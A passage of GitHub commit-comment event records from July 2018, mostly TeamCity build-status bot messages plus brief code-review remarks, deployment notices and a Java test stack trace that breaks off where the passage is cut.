{"id":"7983933960","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-filterorder"},"payload":{"comment":{"id":29751966,"position":null,"line":null,"path":null,"commit_id":"2e228a0c50f6175c0f0f26a7dbdee54902c716b1","created_at":"2018-07-18T16:00:16Z","updated_at":"2018-07-18T16:00:16Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-filterorder :: BuildTest [Build 46](https://teamcity.otenv.com/viewLog.html?buildId=8957023&buildTypeId=ArchitectureTeam_JavaPlatform_OtjFilterorder_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-18T16:00:16Z"}
{"id":"7983934048","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-filterorder"},"payload":{"comment":{"id":29751971,"position":null,"line":null,"path":null,"commit_id":"2e228a0c50f6175c0f0f26a7dbdee54902c716b1","created_at":"2018-07-18T16:00:17Z","updated_at":"2018-07-18T16:00:17Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-filterorder :: BuildTest [Build 47](https://teamcity.otenv.com/viewLog.html?buildId=8957030&buildTypeId=ArchitectureTeam_JavaPlatform_OtjFilterorder_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-18T16:00:17Z"}
{"id":"7983934111","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-filterorder"},"payload":{"comment":{"id":29751972,"position":null,"line":null,"path":null,"commit_id":"2e228a0c50f6175c0f0f26a7dbdee54902c716b1","created_at":"2018-07-18T16:00:17Z","updated_at":"2018-07-18T16:00:17Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-filterorder :: BuildTest [Build 47](https://teamcity.otenv.com/viewLog.html?buildId=8957030&buildTypeId=ArchitectureTeam_JavaPlatform_OtjFilterorder_BuildTest) is now running\n"}},"created_at":"2018-07-18T16:00:17Z"}
{"id":"7983934233","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-filterorder"},"payload":{"comment":{"id":29751973,"position":null,"line":null,"path":null,"commit_id":"2e228a0c50f6175c0f0f26a7dbdee54902c716b1","created_at":"2018-07-18T16:00:18Z","updated_at":"2018-07-18T16:00:18Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-filterorder :: BuildTest [Build 48](https://teamcity.otenv.com/viewLog.html?buildId=8957031&buildTypeId=ArchitectureTeam_JavaPlatform_OtjFilterorder_BuildTest) is now running\n"}},"created_at":"2018-07-18T16:00:18Z"}
{"id":"7983934305","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-filterorder"},"payload":{"comment":{"id":29751974,"position":null,"line":null,"path":null,"commit_id":"2e228a0c50f6175c0f0f26a7dbdee54902c716b1","created_at":"2018-07-18T16:00:19Z","updated_at":"2018-07-18T16:00:19Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-filterorder :: BuildTest [Build 48](https://teamcity.otenv.com/viewLog.html?buildId=8957031&buildTypeId=ArchitectureTeam_JavaPlatform_OtjFilterorder_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-18T16:00:19Z"}
{"id":"7983934715","type":"CommitCommentEvent","actor":{"login":"idimon4uk"},"repo":{"name":"idimon4uk/python-trezor"},"payload":{"comment":{"id":29751975,"position":39,"line":114,"path":"trezorlib/tx_api.py","commit_id":"9fe50108b7b97657b01ceebad9380d2d09384a22","created_at":"2018-07-18T16:00:23Z","updated_at":"2018-07-18T16:00:23Z","author_association":"OWNER","body":"O , i can try\r\n"}},"created_at":"2018-07-18T16:00:23Z"}
{"id":"7983936623","type":"CommitCommentEvent","actor":{"login":"enzobotti"},"repo":{"name":"enzobotti/KCM-pagina-1"},"payload":{"comment":{"id":29751993,"position":null,"line":null,"path":null,"commit_id":"4dc181c65304bd0b3cb4023f3bab678f565bf1ea","created_at":"2018-07-18T16:00:41Z","updated_at":"2018-07-18T16:00:41Z","author_association":"OWNER","body":"gtgtgt"}},"created_at":"2018-07-18T16:00:41Z"}
{"id":"7983937882","type":"CommitCommentEvent","actor":{"login":"stevekuznetsov"},"repo":{"name":"kubernetes/test-infra"},"payload":{"comment":{"id":29752014,"position":15,"line":530,"path":"prow/kube/client.go","commit_id":"93350bdb0782eec8ea8e8d2011d60d72c6cfb4f6","created_at":"2018-07-18T16:00:54Z","updated_at":"2018-07-18T16:00:54Z","author_association":"CONTRIBUTOR","body":"I see. Didn't realize this was used for non-test container logs. "}},"created_at":"2018-07-18T16:00:54Z"}
{"id":"7983938350","type":"CommitCommentEvent","actor":{"login":"enzobotti"},"repo":{"name":"enzobotti/KCM-pagina-1"},"payload":{"comment":{"id":29752023,"position":null,"line":null,"path":null,"commit_id":"4dc181c65304bd0b3cb4023f3bab678f565bf1ea","created_at":"2018-07-18T16:00:58Z","updated_at":"2018-07-18T16:00:58Z","author_association":"OWNER","body":"6t6t"}},"created_at":"2018-07-18T16:00:58Z"}
{"id":"7983941469","type":"CommitCommentEvent","actor":{"login":"mineo"},"repo":{"name":"metabrainz/picard"},"payload":{"comment":{"id":29752073,"position":null,"line":null,"path":null,"commit_id":"4c5f9b2984884ab09eab06282fed8ee33e909b8b","created_at":"2018-07-18T16:01:28Z","updated_at":"2018-07-18T16:01:28Z","author_association":"MEMBER","body":"It would be great if you could mention the reason for this change. According to `INSTALL.md` there's no such restriction."}},"created_at":"2018-07-18T16:01:28Z"}
{"id":"7983943749","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29752090,"position":null,"line":null,"path":null,"commit_id":"b514446e1af17ca2a1a6059365a1701044177ca0","created_at":"2018-07-18T16:01:51Z","updated_at":"2018-07-18T16:01:51Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#ci-85](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#ci-85).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-85-next50.pantheonsite.io/)"}},"created_at":"2018-07-18T16:01:51Z"}
{"id":"7983943767","type":"CommitCommentEvent","actor":{"login":"albertpai"},"repo":{"name":"albertpai/Kodflix"},"payload":{"comment":{"id":29752091,"position":12,"line":7,"path":"src/backend/app.js","commit_id":"9d9a98775c0a52d727b9e7ffe81760fc84934fab","created_at":"2018-07-18T16:01:51Z","updated_at":"2018-07-18T16:01:51Z","author_association":"OWNER","body":"Connect the frontend and backend servers #22"}},"created_at":"2018-07-18T16:01:51Z"}
{"id":"7983943919","type":"CommitCommentEvent","actor":{"login":"Ngalstyan4"},"repo":{"name":"Ngalstyan4/timescaledb"},"payload":{"comment":{"id":29752093,"position":104,"line":104,"path":"src/ddl_utils.c","commit_id":"13073d210c2bffec9a0bd4722d796a3684816faa","created_at":"2018-07-18T16:01:53Z","updated_at":"2018-07-18T16:01:53Z","author_association":"OWNER","body":"Ok, I think I can get rid of `hypertable_get_all`. But if we decide we want to allow calling `show_chunks` with time constraint for all hypertables, I would still need to call `chunks_find_all_in_range` right?"}},"created_at":"2018-07-18T16:01:53Z"}
{"id":"7983946433","type":"CommitCommentEvent","actor":{"login":"Sunaries"},"repo":{"name":"Kagamia/WzComparerR2"},"payload":{"comment":{"id":29752127,"position":null,"line":null,"path":null,"commit_id":"38db17668e54176fe7b46b99fb2263883ad5049d","created_at":"2018-07-18T16:02:16Z","updated_at":"2018-07-18T16:02:16Z","author_association":"NONE","body":"What's this? :o"}},"created_at":"2018-07-18T16:02:16Z"}
{"id":"7983951234","type":"CommitCommentEvent","actor":{"login":"nfo"},"repo":{"name":"onfocusio/Prebid.js"},"payload":{"comment":{"id":29752175,"position":4,"line":13,"path":"modules/adagioAnalyticsAdapter.js","commit_id":"0a7064caac31b99fd5b74b98a2a17e186feb3e11","created_at":"2018-07-18T16:03:06Z","updated_at":"2018-07-18T16:03:06Z","author_association":"NONE","body":"`REQUEST_SEND` -> `REQUEST_SENT`"}},"created_at":"2018-07-18T16:03:06Z"}
{"id":"7983951965","type":"CommitCommentEvent","actor":{"login":"mineo"},"repo":{"name":"metabrainz/picard"},"payload":{"comment":{"id":29752176,"position":null,"line":null,"path":null,"commit_id":"4c5f9b2984884ab09eab06282fed8ee33e909b8b","created_at":"2018-07-18T16:03:14Z","updated_at":"2018-07-18T16:03:14Z","author_association":"MEMBER","body":"Also, some Linux distributions are actually already on 5.11, do we not support that?"}},"created_at":"2018-07-18T16:03:14Z"}
{"id":"7983954598","type":"CommitCommentEvent","actor":{"login":"dbradul"},"repo":{"name":"ismelyanets/python_hw"},"payload":{"comment":{"id":29752184,"position":14,"line":12,"path":"hw_34.py","commit_id":"8aa4fdaab0c7b1bf6be8034326727927533c0b34","created_at":"2018-07-18T16:03:40Z","updated_at":"2018-07-18T16:03:40Z","author_association":"NONE","body":"Здесь вы делаете цикл с одним и тем же весом, пока не заполните до допустимого предела. Это возможное решение, но ему не хватает гибкости, чтобы можно было передавать несколько разных людей одной Годзилле.\r\n\r\nТ.е. использование для внешнего пользователя выглядит следующим образом:\r\n```\r\na = Godzilla(200)\r\nprint(a.eat(random.randint(30, 75)))\r\nprint(a.eat(random.randint(30, 75)))\r\nprint(a.eat(random.randint(30, 75)))\r\nprint(a.eat(random.randint(30, 75)))\r\n...\r\n```\r\nДля этого, чтобы промежуточный объем желудка сохранялся между вызовами метода `eat`, вам может потребоваться `fill_stomach_volume` хранить как аттрибут класса."}},"created_at":"2018-07-18T16:03:40Z"}
{"id":"7983957921","type":"CommitCommentEvent","actor":{"login":"Kagamia"},"repo":{"name":"Kagamia/WzComparerR2"},"payload":{"comment":{"id":29752201,"position":null,"line":null,"path":null,"commit_id":"38db17668e54176fe7b46b99fb2263883ad5049d","created_at":"2018-07-18T16:04:13Z","updated_at":"2018-07-18T16:04:13Z","author_association":"OWNER","body":"Bug fix, an equipment with options but no `info\\grade` defined."}},"created_at":"2018-07-18T16:04:13Z"}
{"id":"7983959116","type":"CommitCommentEvent","actor":{"login":"ezimanyi"},"repo":{"name":"spinnaker/orca"},"payload":{"comment":{"id":29752207,"position":5,"line":115,"path":"orca-clouddriver/src/main/groovy/com/netflix/spinnaker/orca/clouddriver/tasks/servergroup/ServerGroupCacheForceRefreshTask.groovy","commit_id":"3607e7252a3d70636137aa0973e9427de2194ce7","created_at":"2018-07-18T16:04:26Z","updated_at":"2018-07-18T16:04:26Z","author_association":"MEMBER","body":"I've fixed this in https://github.com/spinnaker/orca/pull/2330; thanks for pointing it out."}},"created_at":"2018-07-18T16:04:26Z"}
{"id":"7983959518","type":"CommitCommentEvent","actor":{"login":"yunqu"},"repo":{"name":"Xilinx/PYNQ-Networking"},"payload":{"comment":{"id":29752215,"position":null,"line":null,"path":null,"commit_id":"ac33b1ff7ff6159fbf92241227beb8ad06a7778a","created_at":"2018-07-18T16:04:30Z","updated_at":"2018-07-18T16:04:30Z","author_association":"COLLABORATOR","body":"Which release are you using?"}},"created_at":"2018-07-18T16:04:30Z"}
{"id":"7983959857","type":"CommitCommentEvent","actor":{"login":"ResearcherNo1"},"repo":{"name":"ResearcherNo1/Arduino_robot"},"payload":{"comment":{"id":29752220,"position":null,"line":null,"path":null,"commit_id":"c933aeeab6a604a96901d6d7678e9836e8e79878","created_at":"2018-07-18T16:04:34Z","updated_at":"2018-07-18T16:04:34Z","author_association":"OWNER","body":"Add* new metod"}},"created_at":"2018-07-18T16:04:34Z"}
{"id":"7983962756","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29752229,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-18T16:05:03Z","updated_at":"2018-07-18T16:05:03Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 233](https://teamcity.otenv.com/viewLog.html?buildId=8957101&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) is now running\n"}},"created_at":"2018-07-18T16:05:03Z"}
{"id":"7983965729","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29752285,"position":null,"line":null,"path":null,"commit_id":"b174daeec0299ed8db9ec76e264b27986c2de721","created_at":"2018-07-18T16:05:32Z","updated_at":"2018-07-18T16:05:32Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 56](https://teamcity.otenv.com/viewLog.html?buildId=8957121&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) is now running\n"}},"created_at":"2018-07-18T16:05:32Z"}
{"id":"7983965748","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29752286,"position":null,"line":null,"path":null,"commit_id":"b174daeec0299ed8db9ec76e264b27986c2de721","created_at":"2018-07-18T16:05:32Z","updated_at":"2018-07-18T16:05:32Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 56](https://teamcity.otenv.com/viewLog.html?buildId=8957121&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:00"}},"created_at":"2018-07-18T16:05:32Z"}
{"id":"7983965854","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29752287,"position":null,"line":null,"path":null,"commit_id":"b174daeec0299ed8db9ec76e264b27986c2de721","created_at":"2018-07-18T16:05:33Z","updated_at":"2018-07-18T16:05:33Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 57](https://teamcity.otenv.com/viewLog.html?buildId=8957323&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) is now running\n"}},"created_at":"2018-07-18T16:05:33Z"}
{"id":"7983965888","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29752288,"position":null,"line":null,"path":null,"commit_id":"b174daeec0299ed8db9ec76e264b27986c2de721","created_at":"2018-07-18T16:05:34Z","updated_at":"2018-07-18T16:05:34Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 57](https://teamcity.otenv.com/viewLog.html?buildId=8957323&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-18T16:05:34Z"}
{"id":"7983966017","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29752289,"position":null,"line":null,"path":null,"commit_id":"b174daeec0299ed8db9ec76e264b27986c2de721","created_at":"2018-07-18T16:05:35Z","updated_at":"2018-07-18T16:05:35Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 58](https://teamcity.otenv.com/viewLog.html?buildId=8957324&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) is now running\n"}},"created_at":"2018-07-18T16:05:35Z"}
{"id":"7983966105","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29752290,"position":null,"line":null,"path":null,"commit_id":"b174daeec0299ed8db9ec76e264b27986c2de721","created_at":"2018-07-18T16:05:36Z","updated_at":"2018-07-18T16:05:36Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 58](https://teamcity.otenv.com/viewLog.html?buildId=8957324&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-18T16:05:36Z"}
{"id":"7983966272","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29752294,"position":null,"line":null,"path":null,"commit_id":"b174daeec0299ed8db9ec76e264b27986c2de721","created_at":"2018-07-18T16:05:37Z","updated_at":"2018-07-18T16:05:37Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 59](https://teamcity.otenv.com/viewLog.html?buildId=8957325&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-18T16:05:37Z"}
{"id":"7983966277","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29752293,"position":null,"line":null,"path":null,"commit_id":"b174daeec0299ed8db9ec76e264b27986c2de721","created_at":"2018-07-18T16:05:37Z","updated_at":"2018-07-18T16:05:37Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 59](https://teamcity.otenv.com/viewLog.html?buildId=8957325&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) is now running\n"}},"created_at":"2018-07-18T16:05:37Z"}
{"id":"7983969672","type":"CommitCommentEvent","actor":{"login":"ejmg"},"repo":{"name":"ejmg/an-idiots-guide-to-installing-arch-on-a-lenovo-carbon-x1-gen-6"},"payload":{"comment":{"id":29752344,"position":8,"line":97,"path":"README.org","commit_id":"0286bf48e30c505393b38a5d60eefbccbf75e24d","created_at":"2018-07-18T16:06:11Z","updated_at":"2018-07-18T16:06:11Z","author_association":"OWNER","body":"I agree. I totally didn't know and I'm more than happy to correct bad advice. The guide was made by an idiot, after all..."}},"created_at":"2018-07-18T16:06:11Z"}
{"id":"7983971164","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29752369,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-18T16:06:26Z","updated_at":"2018-07-18T16:06:26Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 153](https://teamcity.otenv.com/viewLog.html?buildId=8957200&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) is now running\n"}},"created_at":"2018-07-18T16:06:26Z"}
{"id":"7983971198","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29752371,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-18T16:06:26Z","updated_at":"2018-07-18T16:06:26Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 153](https://teamcity.otenv.com/viewLog.html?buildId=8957200&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:00"}},"created_at":"2018-07-18T16:06:26Z"}
{"id":"7983971275","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29752375,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-18T16:06:27Z","updated_at":"2018-07-18T16:06:27Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 154](https://teamcity.otenv.com/viewLog.html?buildId=8957364&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) is now running\n"}},"created_at":"2018-07-18T16:06:27Z"}
{"id":"7983971328","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29752376,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-18T16:06:27Z","updated_at":"2018-07-18T16:06:27Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 154](https://teamcity.otenv.com/viewLog.html?buildId=8957364&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-18T16:06:27Z"}
{"id":"7983971445","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29752377,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-18T16:06:29Z","updated_at":"2018-07-18T16:06:29Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 155](https://teamcity.otenv.com/viewLog.html?buildId=8957365&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) is now running\n"}},"created_at":"2018-07-18T16:06:29Z"}
{"id":"7983971452","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29752378,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-18T16:06:29Z","updated_at":"2018-07-18T16:06:29Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 155](https://teamcity.otenv.com/viewLog.html?buildId=8957365&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-18T16:06:29Z"}
{"id":"7983971563","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29752379,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-18T16:06:30Z","updated_at":"2018-07-18T16:06:30Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 233](https://teamcity.otenv.com/viewLog.html?buildId=8957101&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 34 Build time: 00:01:26"}},"created_at":"2018-07-18T16:06:30Z"}
{"id":"7983971585","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29752380,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-18T16:06:30Z","updated_at":"2018-07-18T16:06:30Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 200](https://teamcity.otenv.com/viewLog.html?buildId=8957214&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) is now running\n"}},"created_at":"2018-07-18T16:06:30Z"}
{"id":"7983971630","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29752381,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-18T16:06:31Z","updated_at":"2018-07-18T16:06:31Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 156](https://teamcity.otenv.com/viewLog.html?buildId=8957366&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) is now running\n"}},"created_at":"2018-07-18T16:06:31Z"}
{"id":"7983971663","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29752382,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-18T16:06:31Z","updated_at":"2018-07-18T16:06:31Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 156](https://teamcity.otenv.com/viewLog.html?buildId=8957366&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-18T16:06:31Z"}
{"id":"7983976885","type":"CommitCommentEvent","actor":{"login":"yeltnar"},"repo":{"name":"yeltnar/ws-expose-server"},"payload":{"comment":{"id":29752406,"position":null,"line":null,"path":null,"commit_id":"a60d92aa0ad2e547a87d736d4d20f11d0ad06bc3","created_at":"2018-07-18T16:07:26Z","updated_at":"2018-07-18T16:07:26Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8839f9f8-ee5d-429f-8749-52267c653952?env_id=ibm%3Ayp%3Aus-south \"ws-expose\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/5c41e84d-5968-4649-8c7b-52afb41b0a6e?env_id=ibm%3Ayp%3Aus-south \"ws-expose-pipeline\") deployed [ws-expose-server](https://github.com/yeltnar/ws-expose-server/releases/tag/deploy-ibm-yp-us-south-andcbrant-gmail.com-dev-20180718-160725 \"deploy-ibm-yp-us-south-andcbrant-gmail.com-dev-20180718-160725\") to [dev](https://console.bluemix.net/apps/e68f5516-a561-42c7-ac49-af54fea27ed3?env_id=ibm:yp:us-south \"ibm:yp:us-south:andcbrant@gmail.com:dev\"), including this commit"}},"created_at":"2018-07-18T16:07:26Z"}
{"id":"7983977636","type":"CommitCommentEvent","actor":{"login":"SalvadorLopezTactos"},"repo":{"name":"SalvadorLopezTactos/unifinRediseno"},"payload":{"comment":{"id":29752408,"position":2,"line":2,"path":"custom/Extension/application/Ext/Language/es_LA.sugar_tct_etapa_ddw_lis.php","commit_id":"9961feacec2700fc5d7da9d3c232e3d2a2ac0d9a","created_at":"2018-07-18T16:07:34Z","updated_at":"2018-07-18T16:07:34Z","author_association":"OWNER","body":"Eliminar el archivo"}},"created_at":"2018-07-18T16:07:34Z"}
{"id":"7983978007","type":"CommitCommentEvent","actor":{"login":"gdelhumeau"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29752409,"position":67,"line":606,"path":"xwiki-platform-core/xwiki-platform-test/xwiki-platform-test-ui/src/main/java/org/xwiki/test/ui/XWikiWebDriver.java","commit_id":"4212e52f380b4d9d1ecf8c30eced5a5ab52210ea","created_at":"2018-07-18T16:07:38Z","updated_at":"2018-07-18T16:07:38Z","author_association":"MEMBER","body":"This is not working on my computer.\r\n\r\nI got this stack trace:\r\n```\r\nTests run: 1, Failures: 0, Errors: 1, Skipped: 0, Time elapsed: 25.337 sec <<< FAILURE! - in org.xwiki.platform.notifications.test.ui.AllITs\r\norg.xwiki.platform.notifications.test.ui.AllITs  Time elapsed: 25.335 sec  <<< ERROR!\r\njava.lang.RuntimeException: Failed to initialize PO suite\r\n\tat org.xwiki.test.ui.PageObjectSuite.beforeTests(PageObjectSuite.java:75)\r\n\tat org.xwiki.test.integration.XWikiExecutorSuite.run(XWikiExecutorSuite.java:192)\r\n\tat org.junit.runner.JUnitCore.run(JUnitCore.java:137)\r\n\tat org.junit.runner.JUnitCore.run(JUnitCore.java:115)\r\n\tat org.junit.vintage.engine.execution.RunnerExecutor.execute(RunnerExecutor.java:39)\r\n\tat java.util.stream.ForEachOps$ForEachOp$OfRef.accept(ForEachOps.java:184)\r\n\tat java.util.stream.ReferencePipeline$3$1.accept(ReferencePipeline.java:193)\r\n\tat java.util.Iterator.forEachRemaining(Iterator.java:116)\r\n\tat java.util.Spliterators$IteratorSpliterator.forEachRemaining(Spliterators.java:1801)\r\n\tat java.util.stream.AbstractPipeline.copyInto(AbstractPipeline.java:481)\r\n\tat java.util.stream.AbstractPipeline.wrapAndCopyInto(AbstractPipeline.java:471)\r\n\tat java.util.stream.ForEachOps$ForEachOp.evaluateSequential(ForEachOps.java:151)\r\n\tat java.util.stream.ForEachOps$ForEachOp$OfRef.evaluateSequential(ForEachOps.java:174)\r\n\tat java.util.stream.AbstractPipeline.evaluate(AbstractPipeline.java:234)\r\n\tat java.util.stream.ReferencePipeline.forEach(ReferencePipeline.java:418)\r\n\tat org.junit.vintage.engine.VintageTestEngine.executeAllChildren(VintageTestEngine.java:79)\r\n\tat org.junit.vintage.engine.VintageTestEngine.execute(VintageTestEngine.java:70)\r\n\tat org.junit.platform.launcher.core.DefaultLauncher.execute(DefaultLauncher.java:170)\r\n\tat org.junit.platform.launcher.core.DefaultLauncher.execute(DefaultLauncher.java:154)\r\n\tat org.junit.platform.launcher.core.DefaultLauncher.execute(DefaultLauncher.java:90)\r\n\tat org.junit.platform.surefire.provider.JUnitPlatformProvider.invokeAllTests(JUnitPlatformProvider.java:132)\r\n\tat org.junit.platform.surefire.provider.JUnitPlatformProvider.invoke(JUnitPlatformProvider.java:111)\r\n\tat org.apache.maven.surefire.booter.ForkedBooter.invokeProviderInSameClassLoader(ForkedBooter.java:290)\r\n\tat org.apache.maven.surefire.booter.ForkedBooter.runSuitesInProcess(ForkedBooter.java:242)\r\n\tat org.apache.maven.surefire.booter.ForkedBooter.main(ForkedBooter.java:121)\r\nCaused by: java.lang.RuntimeException: Failed to initialize PersistentTestContext\r\n\tat 